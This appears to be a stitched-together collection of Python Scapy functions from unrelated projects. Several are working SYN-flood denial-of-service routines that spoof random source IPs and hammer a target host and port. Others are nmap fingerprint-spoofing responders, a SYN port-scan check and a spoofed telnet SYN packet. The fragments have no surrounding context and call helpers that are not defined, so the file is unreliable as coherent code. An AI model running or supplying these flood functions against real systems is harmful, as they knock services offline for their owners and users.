def service_craft(pkt, fp, mac, service, type_=False): try: ether = Ether() ether.src = mac ether.dst = pkt[Ether].dst ether.type = 0x800 except IndexError: ether = None ip = IP() ip.src = pkt[IP].dst ip.dst = pkt[IP].src ip.ttl = int(fp.ttl, 16) ip.flags = 0x4000 tcp = TCP() tcp.sport = pkt[TCP].dport tcp.dport = pkt[TCP].sport if type_: tcp.flags = 0x018 # PSH / ACK tcp.seq = pkt[TCP].seq tcp.ack = pkt[TCP].ack data = service[pkt[TCP].dport] fin_pkt = ip / tcp / data if ether is None else ether / ip / tcp / data return fin_pkt else: tcp.flags = 0x012 # SYN / ACK tcp.seq = pkt[TCP].seq tcp.ack = pkt[TCP].seq + 1 fin_pkt = ip / tcp if ether is None else ether / ip / tcp return fin_pkt
def seqgen_pkt_craft(pkt, fp, mac, pno): try: ether = Ether() ether.src = mac ether.dst = pkt[Ether].dst ether.type = 0x800 except IndexError: ether = None ip = IP() ip.src = pkt[IP].dst ip.dst = pkt[IP].src ip.ttl = int(fp.probe['T1']['TTL'], 16) ip.flags = fp.probe['T1']['DF'] ip.id = fp.ip_id_gen() tcp = TCP() s_val = fp.probe['T1']['S'] if s_val == 'Z': tcp.seq = 0 elif s_val == 'A': tcp.seq = pkt[TCP].ack elif s_val == 'A+': tcp.seq = pkt[TCP].ack + 1 else: tcp.seq = fp.tcp_seq_gen() a_val = fp.probe['T1']['A'] if a_val == 'Z': tcp.ack = 0 elif a_val == 'S': tcp.ack = pkt[TCP].seq elif a_val == 'S+': tcp.ack = pkt[TCP].seq + 1 else: tcp.ack = pkt[TCP].seq + 369 flag_val = fp.probe['T1']['F'] tcp.flags = flag_val tcp.window = fp.probe['WIN']['W' + pno] tcp.sport = pkt[TCP].dport tcp.dport = pkt[TCP].sport tcp.options = fp.probe['OPS']['O' + pno] rd_val = fp.probe['T1']['RD'] if rd_val != '0': crc = int(rd_val, 16) data = b'TCP Port is closed\x00' data += compensate(data, crc) fin_pkt = ip / tcp / data if ether is None else ether / ip / tcp / data else: fin_pkt = ip / tcp if ether is None else ether / ip / tcp return fin_pkt
def doSynFlood(origin_ip=None, origin_port=None, target_ip=None, target_port=None, interface=None, duration=None, gap=0): ''' Starts Syn Flood attacks Arguments: origin_ip (str): attacker ip origin_port (int): attacker port target_ip (str): target ip target_port (int): target port interface (str): network interface to use duration (int): duration of the attack gap (int): gap (delay) between packets Returns: None ''' # Check if everything is filled out if target_ip is None: return if target_port is None: return if duration is None: return if gap >= duration: return # Prepare the packet ip_layer = IP() ip_layer.src = origin_ip ip_layer.dst = target_ip tcp_layer = TCP() tcp_layer.sport = origin_port tcp_layer.dport = target_port tcp_layer.flags = "S" # Prepare timings time_start = time() time_end = time_start + duration # Start attack while (time() <= time_end): #duration # Constantly changing values tcp_layer.seq = GenerateRandomSafeSeq() tcp_layer.ack = GenerateRandomSafeSeq() tcp_layer.window = GenerateRandomWindow() attack_packet = ip_layer/tcp_layer # packet to send send(attack_packet, iface=interface) if gap > 0: sleep(gap) #gap
def configureTCPPacket(port): TCP_Packet = TCP() TCP_Packet.dport = port TCP_Packet.flags = "S" # SYN TCP_Packet.seq = getRand() TCP_Packet.sport = getRand() TCP_Packet.window = getRand() return TCP_Packet
def is_port_open(ip_addr, port, timeout=5, verbose=False): ip = IP() ip.dst = ip_addr syn = TCP() syn.sport = choice(range(1000, 50000)) syn.dport = port syn.flags = 'S' syn.seq = 1 packet = ip/syn synack = sr1(packet, timeout=timeout, verbose=verbose) if synack and synack.sprintf('%TCP.flags%') == 'SA': return True return False
def flood(target): IP_Packet = IP() IP_Packet.src = randomData.random_IP() IP_Packet.dst = target[0] TCP_Packet = TCP() TCP_Packet.sport = random.randint(1000, 10000) TCP_Packet.dport = target[1] TCP_Packet.flags = "S" TCP_Packet.seq = random.randint(1000, 10000) TCP_Packet.window = random.randint(1000, 10000) for _ in range(16): try: send(IP_Packet / TCP_Packet, verbose = False) except Exception as e: print(f"{Fore.MAGENTA}Error while sending SYN packet\n{Fore.MAGENTA}{e}{Fore.RESET}") else: print(f"{Fore.GREEN}[+] {Fore.YELLOW}SYN packet sent to {'{}:{}'.format(*target)}.{Fore.RESET}")
def syn_flood(ip_destination, port_destination, limit): total = 0 print("Enviando Pacotes") for x in range(0, limit): ip_packet = IP() ip_packet.src = ".".join( map(str, (random.randint(0, 255) for _ in range(4)))) ip_packet.dst = ip_destination tcp_packet = TCP() tcp_packet.sport = random.randint(1000, 9000) tcp_packet.dport = port_destination tcp_packet.flags = "S" tcp_packet.seq = random.randint(1000, 9000) tcp_packet.window = random.randint(1000, 9000) print("Source: " + ip_packet.src + ":" + str(tcp_packet.sport)) send(ip_packet / tcp_packet, verbose=0) total += 1 print("All packets sent")
def syn_flood(): global FINISH while True: if FINISH: break IP_Packet = IP() IP_Packet.src = randomData.random_IP() IP_Packet.dst = target_ip TCP_Packet = TCP() TCP_Packet.sport = random.randint(1000, 10000) TCP_Packet.dport = target_port TCP_Packet.flags = "S" TCP_Packet.seq = random.randint(1000, 10000) TCP_Packet.window = random.randint(1000, 10000) try: send(IP_Packet / TCP_Packet, verbose=False) except Exception as e: print(e) else: print("[+] SYN packet sent!")
def flood(target): IP_Packet = IP() IP_Packet.src = random_IP() IP_Packet.dst = target[0] TCP_Packet = TCP() TCP_Packet.sport = random.randint(1000, 10000) TCP_Packet.dport = target[1] TCP_Packet.flags = "S" TCP_Packet.seq = random.randint(1000, 10000) TCP_Packet.window = random.randint(1000, 10000) for _ in range(16): try: send(IP_Packet / TCP_Packet, verbose=False) except Exception as e: print(f"[{red} bold][✘] ERROR[/{red} bold] " + f"[{yellow}]while sending SYN packet[/{yellow}]\n{e}") else: print(f"[{green}][✔] SUCCESS[/{green}] " + f"[{yellow}]SYN packet sent to[{yellow}] " + f"[{blue}]{'{}:{}'.format(*target)}")
def server_tcp(self, flags, payload=b"", count=True): data_length = max(len(payload), 1) tcp = TCP() tcp.flags = flags tcp.sport = self.service tcp.dport = self.client_port tcp.seq = self.ss tcp.ack = self.sa if count: self.ss += data_length self.ca += data_length packet = Ether(src=self.server.mac, dst=self.client.mac) packet /= IP(src=self.server.ip, dst=self.client.ip) packet /= tcp if len(payload) > 0: packet /= payload self.packets.append(packet)
def flood(target): IP_Packet = IP() IP_Packet.src = random_IP() IP_Packet.dst = target[0] TCP_Packet = TCP() TCP_Packet.sport = random.randint(1000, 10000) TCP_Packet.dport = target[1] TCP_Packet.flags = "S" TCP_Packet.seq = random.randint(1000, 10000) TCP_Packet.window = random.randint(1000, 10000) for _ in range(16): try: send(IP_Packet / TCP_Packet, verbose=False) except Exception as e: print( f"\033[1m{cs('[✘] ERROR', red)}\033[0m {cs('while sending SYN packet', yellow)}\n{e}" ) else: print( f"{cs(f'[✔] SUCCESS', green)} {cs(f'SYN packet sent to', yellow)} {blue}{'{}:{}'.format(*target)}\033[0m" )
def t2tot7_craft(pkt, fp, mac, tno): try: ether = Ether() ether.src = mac ether.dst = pkt[Ether].dst ether.type = 0x800 except IndexError: ether = None ip = IP() ip.src = pkt[IP].dst ip.dst = pkt[IP].src ip.ttl = int(fp.probe[tno]['TTL'], 16) ip.flags = fp.probe[tno]['DF'] ip.id = random.randint(1, 1000) tcp = TCP() s_val = fp.probe[tno]['S'] if s_val == 'Z': tcp.seq = 0 elif s_val == 'A': tcp.seq = pkt[TCP].ack elif s_val == 'A+': tcp.seq = pkt[TCP].ack + 1 else: tcp.seq = pkt[TCP].ack + 369 a_val = fp.probe[tno]['A'] if a_val == 'Z': tcp.ack = 0 elif a_val == 'S': tcp.ack = pkt[TCP].seq elif a_val == 'S+': tcp.ack = pkt[TCP].seq + 1 else: tcp.ack = pkt[TCP].seq + 369 flag_val = fp.probe[tno]['F'] tcp.flags = flag_val w_val = fp.probe[tno]['W'] if w_val == 'ECHOED': tcp.window = pkt[TCP].window else: tcp.window = w_val tcp.sport = pkt[TCP].dport tcp.dport = pkt[TCP].sport o_val = fp.probe[tno]['O'] if o_val == 'EMPTY': pass else: tcp.options = o_val rd_val = fp.probe[tno]['RD'] if rd_val != '0': crc = int(rd_val, 16) data = b'TCP Port is closed\x00' data += compensate(data, crc) fin_pkt = ip / tcp / data if ether is None else ether / ip / tcp / data else: fin_pkt = ip / tcp if ether is None else ether / ip / tcp return fin_pkt
#!/usr/bin/python from scapy.all import IP, TCP a = IP() a.src = "1.2.3.4" a.dst = "10.0.2.15" a.ihl = 5 b = TCP() b.sport = 1551 b.dport = 23 b.seq = 1551 b.flags = 'S' pkt = a/b with open("packet", "wb") as f: f.write(bytes(pkt))